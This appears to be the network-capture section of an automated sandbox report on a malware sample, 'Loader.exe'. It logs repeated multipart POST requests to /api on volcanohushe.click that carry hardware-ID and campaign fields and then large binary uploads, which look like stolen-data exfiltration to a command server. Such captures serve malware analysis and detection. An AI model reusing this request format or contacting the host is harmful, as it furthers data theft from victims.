                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: PHPSESSID=q20vmunt3jnf42kd8hvgi1ijnj; expires=Fri, 18 Apr 2025 19:03:49 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      X-Frame-Options: DENY
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      cf-cache-status: DYNAMIC
                                                                                      vary: accept-encoding
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=brq67tuODW7O9k1YLmh9fmjoGr1lXi5IhDAK9yJxSKoTqaWC%2BWhc%2FMGFBx9LUzoq84%2FoOp5tZSIeYZ1QbNC3kWnh6OOlEW9z4F9xjBB9JkUKm6VPgSR%2BEK8uGK4c0OdRAzAqZJ8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8f6cc00738868cc6-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1920&min_rtt=1916&rtt_var=727&sent=10&recv=18&lost=0&retrans=0&sent_bytes=2842&recv_bytes=13748&delivery_rate=1495901&cwnd=222&unsent_bytes=0&cid=d547dbcfa627943d&ts=1079&x=0"
                                                                                      2024-12-24 01:17:10 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                      Data Ascii: fok 8.46.123.189
                                                                                      2024-12-24 01:17:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      3192.168.2.649712172.67.145.201443504C:\Users\user\Desktop\Loader.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-12-24 01:17:12 UTC280OUTPOST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: multipart/form-data; boundary=THM6ZXIUPF3JTH
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 15084
                                                                                      Host: volcanohushe.click
                                                                                      2024-12-24 01:17:12 UTC15084OUTData Raw: 2d 2d 54 48 4d 36 5a 58 49 55 50 46 33 4a 54 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 38 38 37 44 30 42 36 41 35 33 41 45 45 33 36 38 32 34 36 39 32 36 45 35 33 33 43 36 34 44 37 0d 0a 2d 2d 54 48 4d 36 5a 58 49 55 50 46 33 4a 54 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 54 48 4d 36 5a 58 49 55 50 46 33 4a 54 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 70 71 5a 6e 4b 50 2d 2d 5a 32 78 73 5a 58 68 6c 0d 0a 2d 2d 54 48 4d 36 5a
                                                                                      Data Ascii: --THM6ZXIUPF3JTHContent-Disposition: form-data; name="hwid"E887D0B6A53AEE368246926E533C64D7--THM6ZXIUPF3JTHContent-Disposition: form-data; name="pid"2--THM6ZXIUPF3JTHContent-Disposition: form-data; name="lid"pqZnKP--Z2xsZXhl--THM6Z
                                                                                      2024-12-24 01:17:13 UTC1134INHTTP/1.1 200 OK
                                                                                      Date: Tue, 24 Dec 2024 01:17:13 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: PHPSESSID=0dt54tehclob35v0ocfl0v9ci9; expires=Fri, 18 Apr 2025 19:03:51 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      X-Frame-Options: DENY
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      cf-cache-status: DYNAMIC
                                                                                      vary: accept-encoding
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JXrPgLOL9wmYyo7XHfZLOYuVcCwRbL%2Fty6ZNIgmHleRWjdPQ%2FIw166AbaWRbzbh6HDGfYkFaU6GNaYqdQHYeFB55cwL0BlltwRcjEsE%2FfN59DzdMHIOpMN96mmq%2FCkXJc6fh4WY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8f6cc018fa5043c3-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1631&min_rtt=1602&rtt_var=660&sent=11&recv=21&lost=0&retrans=0&sent_bytes=2842&recv_bytes=16022&delivery_rate=1587819&cwnd=211&unsent_bytes=0&cid=799cea8670083d0f&ts=1238&x=0"
                                                                                      2024-12-24 01:17:13 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                      Data Ascii: fok 8.46.123.189
                                                                                      2024-12-24 01:17:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      4192.168.2.649723172.67.145.201443504C:\Users\user\Desktop\Loader.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-12-24 01:17:15 UTC275OUTPOST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: multipart/form-data; boundary=RFJR6IVX9
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 19912
                                                                                      Host: volcanohushe.click
                                                                                      2024-12-24 01:17:15 UTC15331OUTData Raw: 2d 2d 52 46 4a 52 36 49 56 58 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 38 38 37 44 30 42 36 41 35 33 41 45 45 33 36 38 32 34 36 39 32 36 45 35 33 33 43 36 34 44 37 0d 0a 2d 2d 52 46 4a 52 36 49 56 58 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 52 46 4a 52 36 49 56 58 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 70 71 5a 6e 4b 50 2d 2d 5a 32 78 73 5a 58 68 6c 0d 0a 2d 2d 52 46 4a 52 36 49 56 58 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44
                                                                                      Data Ascii: --RFJR6IVX9Content-Disposition: form-data; name="hwid"E887D0B6A53AEE368246926E533C64D7--RFJR6IVX9Content-Disposition: form-data; name="pid"3--RFJR6IVX9Content-Disposition: form-data; name="lid"pqZnKP--Z2xsZXhl--RFJR6IVX9Content-D
                                                                                      2024-12-24 01:17:15 UTC4581OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5 6f 86 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bf 02 0e
                                                                                      Data Ascii: 2+?2+?o?Mp5p_oI
                                                                                      2024-12-24 01:17:16 UTC1126INHTTP/1.1 200 OK
                                                                                      Date: Tue, 24 Dec 2024 01:17:16 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: PHPSESSID=ukt1j8rjh3ib938jr3vr1pdd58; expires=Fri, 18 Apr 2025 19:03:55 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      X-Frame-Options: DENY
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      cf-cache-status: DYNAMIC
                                                                                      vary: accept-encoding
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yWm2LYcnD5qEQH9qMoge5I65l12EWppgH6lbJwkdiXkiYQVlcyPB1AVawsT8ZabT6tqp5yy6WcLZAZLRYZpiFTTDiMXT3ysRHwod5AMbwwtH5Jtr5B2%2BbNmyGBbTzALX4G9KwX8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8f6cc02c7cc842ef-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1744&min_rtt=1553&rtt_var=964&sent=14&recv=24&lost=0&retrans=0&sent_bytes=2843&recv_bytes=20867&delivery_rate=947436&cwnd=218&unsent_bytes=0&cid=5f5dcf0d80269053&ts=977&x=0"
                                                                                      2024-12-24 01:17:16 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                      Data Ascii: fok 8.46.123.189
                                                                                      2024-12-24 01:17:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      5192.168.2.649730172.67.145.201443504C:\Users\user\Desktop\Loader.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-12-24 01:17:18 UTC282OUTPOST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: multipart/form-data; boundary=0E53ER9TEJJPPHBTI
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 1231
                                                                                      Host: volcanohushe.click
                                                                                      2024-12-24 01:17:18 UTC1231OUTData Raw: 2d 2d 30 45 35 33 45 52 39 54 45 4a 4a 50 50 48 42 54 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 38 38 37 44 30 42 36 41 35 33 41 45 45 33 36 38 32 34 36 39 32 36 45 35 33 33 43 36 34 44 37 0d 0a 2d 2d 30 45 35 33 45 52 39 54 45 4a 4a 50 50 48 42 54 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 30 45 35 33 45 52 39 54 45 4a 4a 50 50 48 42 54 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 70 71 5a 6e 4b 50 2d 2d 5a 32 78 73 5a 58 68 6c
                                                                                      Data Ascii: --0E53ER9TEJJPPHBTIContent-Disposition: form-data; name="hwid"E887D0B6A53AEE368246926E533C64D7--0E53ER9TEJJPPHBTIContent-Disposition: form-data; name="pid"1--0E53ER9TEJJPPHBTIContent-Disposition: form-data; name="lid"pqZnKP--Z2xsZXhl
                                                                                      2024-12-24 01:17:19 UTC1126INHTTP/1.1 200 OK
                                                                                      Date: Tue, 24 Dec 2024 01:17:19 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: PHPSESSID=a6thjfji10a66ofuice71tqto7; expires=Fri, 18 Apr 2025 19:03:58 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      X-Frame-Options: DENY
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      cf-cache-status: DYNAMIC
                                                                                      vary: accept-encoding
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BovA30wopFJOav14gcVPBpGuMXT3oDPd44tltxeoIIiIv%2F7KmpKUYJxY9iC5ZysGylEXjfuHotIo7war95bTKIVEwwGeK4GHFLxee5VJY35UapBUFVlEAQY76GWGnvnUVNryqOc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8f6cc0416a3815c3-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1715&min_rtt=1673&rtt_var=658&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2843&recv_bytes=2149&delivery_rate=1745367&cwnd=252&unsent_bytes=0&cid=7cad3ce6dc8eb753&ts=778&x=0"
                                                                                      2024-12-24 01:17:19 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                      Data Ascii: fok 8.46.123.189
                                                                                      2024-12-24 01:17:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      6192.168.2.649743172.67.145.201443504C:\Users\user\Desktop\Loader.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-12-24 01:17:21 UTC284OUTPOST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: multipart/form-data; boundary=EMRBGJPTQMJ4B8SPM
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 575935
                                                                                      Host: volcanohushe.click
                                                                                      2024-12-24 01:17:21 UTC15331OUTData Raw: 2d 2d 45 4d 52 42 47 4a 50 54 51 4d 4a 34 42 38 53 50 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 38 38 37 44 30 42 36 41 35 33 41 45 45 33 36 38 32 34 36 39 32 36 45 35 33 33 43 36 34 44 37 0d 0a 2d 2d 45 4d 52 42 47 4a 50 54 51 4d 4a 34 42 38 53 50 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 45 4d 52 42 47 4a 50 54 51 4d 4a 34 42 38 53 50 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 70 71 5a 6e 4b 50 2d 2d 5a 32 78 73 5a 58 68 6c
                                                                                      Data Ascii: --EMRBGJPTQMJ4B8SPMContent-Disposition: form-data; name="hwid"E887D0B6A53AEE368246926E533C64D7--EMRBGJPTQMJ4B8SPMContent-Disposition: form-data; name="pid"1--EMRBGJPTQMJ4B8SPMContent-Disposition: form-data; name="lid"pqZnKP--Z2xsZXhl
                                                                                      2024-12-24 01:17:21 UTC15331OUTData Raw: 8a 81 37 2d 8d 1c 3a 11 fb b1 4f b6 4f 08 9c 4d 4a 77 f2 c0 81 66 a5 8d 20 53 74 ac 44 96 53 39 a4 a8 0e 53 25 f8 a5 da c8 e4 fb 98 1a 1e ff 09 21 a5 dd b2 3e ce 5c 28 66 14 4a 78 b1 3c a5 ce 9b de 7f 8f 5a 6d a1 a0 35 0c cb f7 96 02 1b 77 de cf d2 32 4c f1 29 cc 3c 25 6d b3 39 d0 4d 89 d5 e0 2c ca 25 ad 2a d5 8e be c9 f0 e5 e4 0b 91 49 34 c4 9f 08 6e c8 ae 7e bb 09 1b 4a 14 3e 0d 37 c2 c2 fe bf 20 f6 e6 47 51 e5 cf 6a 35 03 22 79 20 71 69 8c 39 f9 f9 12 df 57 a5 a4 2e 2c b7 e1 83 fa 05 24 a0 a1 52 bc d0 af 24 b4 a0 96 81 d2 c9 c9 2e f1 7b 7d 21 0c d9 df b6 8b d9 34 ad d0 de 7a c0 9f d6 c7 cc a9 71 53 0a 39 cb 8a 6c b1 8d 25 93 f6 07 ea bc cf d3 9a 63 ca ee e0 2b 64 15 43 46 2c 39 38 b1 65 df 08 5d 1a 22 3b c2 eb dc 5a af 49 5c 32 12 f4 b7 a3 a2 d4 c1 c4
                                                                                      Data Ascii: 7-:OOMJwf StDS9S%!>\(fJx<Zm5w2L)<%m9M,%*I4n~J>7 GQj5"y qi9W.,$R$.{}!4zqS9l%c+dCF,98e]";ZI\2
                                                                                      2024-12-24 01:17:21 UTC15331OUTData Raw: cf 50 b5 b2 a4 53 8b 96 da bc 14 4f ed 1d 81 5c 68 f2 4b b5 bb 3b eb 75 b1 b5 52 44 e5 e8 9f ed ff 2f 3c 6c 3e 53 88 54 ad bb bc ab b3 9a ee dc 22 a6 f9 67 53 d9 a5 d3 53 2a 47 8c 09 84 1d 5e ef b5 12 48 2b 69 43 77 03 6f f7 d3 e3 14 04 93 ef 42 46 1a 28 d5 42 b5 4e b7 87 bd 66 87 a2 03 8a 82 a3 62 82 9c 11 c8 6a 12 a6 19 61 d9 14 5e 4a c0 b0 24 7b 1e b5 ad aa 25 df ad 33 19 44 fa 37 e1 6a a3 5d e6 f3 78 ee e3 0a 51 08 59 a5 db 3d cf a4 08 10 c6 94 1d e9 51 a1 71 eb 6f 3e 7b 6f 09 2b 53 5f fb 1c ea 83 de 3e 5a bd 43 b1 74 33 69 9b 4a 14 7c 63 52 65 38 c2 3e 37 8c 65 62 b7 7e 8f 6e fd a3 29 c1 69 07 6a ab ba ed 96 66 fe f8 a4 de 90 f3 fb bd 81 32 a3 6b 1e 81 b3 6f df 57 fe 79 50 c2 e6 4c 2f 7f 5e 39 59 67 50 c3 a1 ec f9 45 10 b4 92 56 eb 63 d7 56 de 9e 46
                                                                                      Data Ascii: PSO\hK;uRD/<l>ST"gSS*G^H+iCwoBF(BNfbja^J${%3D7j]xQY=Qqo>{o+S_>ZCt3iJ|cRe8>7eb~n)ijf2koWyPL/^9YgPEVcVF
                                                                                      2024-12-24 01:17:21 UTC15331OUTData Raw: f3 9a 57 71 89 e2 07 9f 4f d2 53 97 0a ff ac 41 19 5d c5 1e 38 ca cb 43 3a c7 d2 9a 97 49 8b e7 6f 4c ec 8c 3f 9e ab d7 78 9e 1b 74 d2 22 47 f8 1f 2a 71 5d 69 b4 19 13 d0 f1 d2 64 42 36 dc 8d 66 50 38 3a 56 03 b3 5f 61 3c 7a 75 29 c0 b1 be 49 cd 30 60 9a 9b 3b e4 ec b4 fb 23 61 56 f6 aa f2 28 af 8c a9 d8 4c a2 6a ac 78 71 58 aa 8b 9d 1e dc 66 37 e5 de 11 87 52 01 f0 ce 94 a7 a9 f6 79 5f 48 47 f0 e6 3a 8d 2d de c1 32 5f 4c 18 f3 dc 59 f9 f0 d3 b5 08 2f 2e 35 c8 73 52 95 01 4e 7b d5 f6 2d bd 5d c3 76 85 86 c6 f3 82 1d 79 f2 9b ac 57 62 1f 10 77 0b ce 48 91 0f 1d 41 51 8f 4b 41 e1 1b eb 03 cd 5d f1 af 0f 92 69 92 9b 71 48 f0 ae 23 84 20 06 98 67 94 ef a5 69 b1 f4 79 7d 95 cf 7e d0 47 47 76 9c a4 61 c1 67 c1 d7 7f 79 8d ba 6d a4 80 eb 45 a3 74 7a 0f ad 70 95
                                                                                      Data Ascii: WqOSA]8C:IoL?xt"G*q]idB6fP8:V_a<zu)I0`;#aV(LjxqXf7Ry_HG:-2_LY/.5sRN{-]vyWbwHAQKA]iqH# giy}~GGvagymEtzp
                                                                                      2024-12-24 01:17:21 UTC15331OUTData Raw: 14 d8 bc 43 77 9e 08 f1 7b a2 20 00 bb 6f d6 46 14 d7 f6 34 89 f0 c8 51 fc 5b 97 84 5f 94 19 91 03 b7 21 27 3c 38 30 22 f0 93 5b e8 c3 75 6f ed 68 e2 4c de e5 3b d9 a0 26 70 64 61 e8 53 46 10 24 41 98 d0 ad a8 3a 1b 6f 19 d9 89 34 9c c4 aa a0 c2 ef 13 26 9f 73 69 42 37 b0 dd a1 7c ec b1 89 3f d2 50 e7 b0 de c5 75 84 f7 9e f4 ba e8 ff bd f1 d7 21 35 0b 83 26 fd a9 76 2f 90 7e fe 86 98 2d 22 7d 63 43 59 56 79 74 0a f6 4c ce 2f d6 1d 53 c5 f1 09 1f 7f f8 4e f8 c4 76 2d d9 98 ee 77 a2 52 63 0e 61 a2 7c 42 25 e8 a7 b1 24 90 3c 2e 9a f0 ff 0f d6 ff 2d 66 f4 36 f0 ae 18 e9 b6 35 89 fc 23 a1 a5 a6 fc 08 32 59 8b 9d 97 06 bf 36 d0 fd 85 1e 09 59 3e d8 c8 c3 83 f5 15 27 27 e4 02 19 3b b3 7f 24 02 00 3e 8e 0a 38 95 fb 17 24 e4 c7 b3 e5 b9 ce 42 e9 77 a6 6e 5f aa cc
                                                                                      Data Ascii: Cw{ oF4Q[_!'<80"[uohL;&pdaSF$A:o4&siB7|?Pu!5&v/~-"}cCYVytL/SNv-wRca|B%$<.-f65#2Y6Y>'';$>8$Bwn_
                                                                                      2024-12-24 01:17:21 UTC15331OUTData Raw: ae 11 5b 7e 0d c6 ee c3 76 7c 8f 0f d1 7b b2 9d 1c 3a 53 3b a9 f3 37 44 80 d5 58 9a 86 c5 4b 2b 84 6e 0b 6f 59 22 aa 2b ee 0c ac b0 76 e8 c4 fd a4 5a 17 9b 16 47 44 c5 84 46 0a 73 5e fd 4b 6c 23 0e 35 9a 8e 34 24 8a 7d c8 ba 1d 6d 96 04 3a a0 89 82 8b a2 e5 b7 f1 eb d1 c4 d4 8f f2 96 38 f8 9d 20 9e 31 33 ce 87 50 23 12 fb 50 24 25 40 3f 66 f0 bf 48 bb fb df c6 4a 4d 12 c4 7e ef aa c3 8c 90 d8 a1 c3 44 4b 30 74 8c 00 e0 68 00 9a 22 7a 05 cc 3f 6a 6f f7 d4 79 70 1c 38 bd b8 29 e9 d4 af 8b a0 6d 23 29 34 35 88 0b 75 dd 3d c4 08 0b 12 1c 04 f7 eb 28 12 80 c1 1b bd 78 6b be 55 06 4c 5c 58 d7 66 b5 0b 4f d2 70 28 29 cc 5f 98 68 10 e5 b0 40 d9 91 6a 61 ee 5e 7e d6 13 ff 97 8c d2 75 e7 ee b9 3f 4a 35 23 07 7f dd d1 16 ba e1 d1 1e 54 18 7c f1 19 44 9b ea 3d 9b b4
                                                                                      Data Ascii: [~v|{:S;7DXK+noY"+vZGDFs^Kl#54$}m:8 13P#P$%@?fHJM~DK0th"z?joyp8)m#)45u=(xkUL\XfOp()_h@ja^~u?J5#T|D=
                                                                                      2024-12-24 01:17:21 UTC15331OUTData Raw: d9 3f b7 a1 a8 a9 4c 89 71 02 7e e1 68 79 d3 59 09 25 b9 31 b7 51 95 77 d7 d2 b2 65 53 88 e0 2b 94 bf 04 a0 ef e5 36 c1 99 48 42 5c 32 2f f7 fc 9d 76 9e 7c 7e 3b 99 73 fa fe 46 7c 56 d2 84 6e 35 2b 2b 3e eb 75 32 55 04 e4 7d fd 1e 91 3e 6c 63 40 1e fd 00 87 f8 e0 cb 8e 31 b5 d6 69 17 09 56 f7 9b 83 f0 92 0e e5 cf 92 aa 63 43 13 b0 a3 aa c0 7e b5 e4 4e 7d 85 e0 05 a0 9a c6 64 e5 cc 30 af f2 49 dd 7a b7 52 c7 fb dd 44 79 80 6f c8 4d a1 12 af 9c 27 c3 d1 7b 94 5f 89 82 47 06 33 ab 75 2d 48 ef 31 b4 f8 eb 5b 7b 8d 71 58 a8 75 d8 ea 6c 90 1e 9b 25 f8 9c c5 d2 e0 7d 58 24 6d e4 e6 af ad 09 a4 f6 eb d6 e8 f2 53 66 39 ee fd dd d3 4a 8f 71 b7 88 43 eb ec 2c 85 55 77 61 41 e6 46 0e 3a ba 3e 51 c9 ae f0 9f 7f fe 75 03 ee 07 01 ef 22 04 a6 41 8d 07 b5 06 c9 b3 af 8f
                                                                                      Data Ascii: ?Lq~hyY%1QweS+6HB\2/v|~;sF|Vn5++>u2U}>lc@1iVcC~N}d0IzRDyoM'{_G3u-H1[{qXul%}X$mSf9JqC,UwaAF:>Qu"A
                                                                                      2024-12-24 01:17:21 UTC15331OUTData Raw: 4d 4f 88 dd 1b 9c da 98 07 a1 9c 64 c1 dc fd d2 80 d2 60 76 4b b7 73 84 d9 38 d4 90 f8 08 c9 65 af 36 13 cb a2 d9 e7 7e 00 fc 5c b5 c6 41 35 aa 8f 7f d4 4b 76 bb f2 f2 ae 84 0c 28 43 a0 04 53 d2 ad c2 b2 86 48 ac 47 77 24 35 d8 27 04 66 8b aa 8f b2 0c 0d ae be 54 7b 80 a4 8a 74 be da c2 16 56 ef df 18 8a 1d d3 3a ac 3b 36 24 4c 90 a2 ef 93 be 0b 65 10 37 5e 53 04 26 5c 05 c6 14 b0 9c dc c2 21 ed d1 8e 9a d3 c1 4e 3a 44 3c d0 d4 10 fe 8b 97 82 3f 3d 28 f8 24 92 6f 8e c8 09 53 de a4 07 b1 cd d9 e9 cb 21 31 35 ef 53 25 9a 51 58 c2 63 6a a5 6a 68 f3 2d ad a7 11 c5 7a 91 82 6d 41 df 7c 3e 04 2d 72 02 4f 6d 9c fd 0f a9 59 a6 b0 51 5e 4c a4 4e b7 8e 26 dd ca fe dd 62 5d 38 bf 62 b9 77 e8 7a be a1 4e 18 e3 cb 23 3e cd bd 25 98 43 4a b6 ff 98 72 b5 54 18 44 ee b3
                                                                                      Data Ascii: MOd`vKs8e6~\A5Kv(CSHGw$5'fT{tV:;6$Le7^S&\!N:D<?=($oS!15S%QXcjjh-zmA|>-rOmYQ^LN&b]8bwzN#>%CJrTD
